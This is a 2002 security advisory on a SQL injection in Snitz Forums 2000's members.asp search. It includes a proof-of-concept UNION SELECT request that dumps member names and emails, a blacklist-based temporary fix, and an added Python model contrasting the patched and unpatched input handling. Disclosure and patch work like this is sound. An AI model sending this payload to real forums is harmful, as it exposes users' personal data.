[NT] Snitz Forums 2000 Remote SQL Query Manipulation Vulnerability
From: support@securiteam.com
Date: 04/20/02
From: support@securiteam.com To: list@securiteam.com Date: Sat, 20 Apr 2002 18:23:49 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Snitz Forums 2000 Remote SQL Query Manipulation Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://forum.snitz.com/> Snitz Forums 2000 is open source ASP-based web
forum software. It runs on Microsoft Windows operating systems. A
vulnerability exists in Snitz Forums 2000 that makes it possible for a
malicious user to remotely manipulate the logic of SQL queries. As a
result, it may be possible for attackers to view all data in the forum's
database. This vulnerability can be exploited with a web browser.
DETAILS
Vulnerable systems:
Snitz Forums 2000 version 3.3 up to version 3.3.03
In the members.asp page, when listing members that match a search criterion,
the M_NAME input is not validated. As a result, an attacker can append an
extra SELECT statement to the query by way of a UNION, allowing them to view
any data in the forum's database.
Proof-of-concept:
Normally, to view the list of members whose member name starts with 'A',
the members.asp page is requested as follows:
/members.asp?mode=search&M_NAME=A&initial=1&method=
The following request exploits the vulnerability, returning other users in
addition to those whose name starts with XXXX:
/members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method=
Temporary fix:
To fix this bug, in members.asp, change the following lines:
SearchName = Request("M_NAME")
if SearchName = "" then
SearchName = Request.Form("M_NAME")
end if
With:
if IsValidString(Request("M_NAME")) then
SearchName = Request("M_NAME")
end if
if SearchName = "" then
if IsValidString(Request.Form("M_NAME")) then
SearchName = Request.Form("M_NAME")
end if
end if
And in function IsValidString(sValidate) in inc_functions.asp, change the
following line:
sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"
With:
sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
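To see what the temporary fix actually changes, here is an added Python model of the patched members.asp logic (example code written for this page, not the Snitz source). It assumes IsValidString rejects any value containing one of the characters in sInvalidChars, which the advisory implies but does not quote, and it feeds the advisory's own two request URLs through the unpatched and patched selection of SearchName.

```python
from urllib.parse import parse_qs, urlsplit

# Blacklists from inc_functions.asp as quoted in the advisory: the original
# list, and the list with the single quote added by the temporary fix.
INVALID_CHARS_ORIGINAL = "!#$%^&*()=+{}[]|\\;:/?>,<"
INVALID_CHARS_FIXED = INVALID_CHARS_ORIGINAL + "'"

# The two request lines given in the advisory (normal search and proof-of-concept).
NORMAL_URL = "/members.asp?mode=search&M_NAME=A&initial=1&method="
POC_URL = ("/members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,"
           "%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,"
           "%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,"
           "%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM"
           "%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method=")


def m_name_from_url(url: str) -> str:
    """Decode the M_NAME query parameter the way Request("M_NAME") would deliver it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("M_NAME", [""])[0]


def is_valid_string(value: str, invalid_chars: str = INVALID_CHARS_FIXED) -> bool:
    """Assumed behaviour of IsValidString(sValidate): reject any listed character."""
    return not any(ch in invalid_chars for ch in value)


def search_name_unpatched(query_name: str, form_name: str) -> str:
    """members.asp before the fix: whatever the client sent reaches the SQL string."""
    return query_name if query_name != "" else form_name


def search_name_patched(query_name: str, form_name: str,
                        invalid_chars: str = INVALID_CHARS_FIXED) -> str:
    """members.asp after the fix: a value failing IsValidString is dropped, so
    SearchName stays empty and no attacker-controlled text reaches the query."""
    name = ""
    if is_valid_string(query_name, invalid_chars):
        name = query_name
    if name == "" and is_valid_string(form_name, invalid_chars):
        name = form_name
    return name


if __name__ == "__main__":
    payload = m_name_from_url(POC_URL)
    print("decoded M_NAME:", payload)
    print("unpatched uses:", repr(search_name_unpatched(payload, "")))
    print("patched uses:  ", repr(search_name_patched(payload, "")))
```

Note that the added quote character also rejects legitimate names such as O'Neil, which is the trade-off of a blacklist fix; parameterised queries would avoid it, but the advisory's temporary fix is what is modelled here.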
ADDITIONAL INFORMATION
The information has been provided by <mailto:acemi_5@yahoo.com> acemi.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.